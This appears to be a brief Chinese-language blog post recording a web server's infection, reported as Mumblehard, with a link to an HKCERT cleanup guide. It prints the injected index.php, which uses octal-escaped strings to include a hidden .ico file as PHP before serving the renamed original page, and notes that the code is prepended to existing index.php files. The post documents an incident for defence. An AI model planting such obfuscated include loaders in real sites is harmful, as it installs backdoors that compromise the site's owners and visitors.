主機中毒記錄 20200108

1.電算中心告知,中了”mumblehard”病毒!

2.參考資料

Linux/BSD 惡意軟件「Mumblehard」偵測及清理 : https://www.hkcert.org/my_url/zh/blog/15050601

3.網頁目錄被放置index.php,原來的index.html被改名為index.html.bak.bak

<?php
/*82cfb*/

@include "\057home\057a02/\160ubli\143_htm\154/myS\164ore/\154ogin\057.10a\064bdbc\056ico";

/*82cfb*/


echo @file_get_contents('index.html.bak.bak');

若目錄本身已有index.php,則其將上面的程式插入原本程式的上方。

 

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料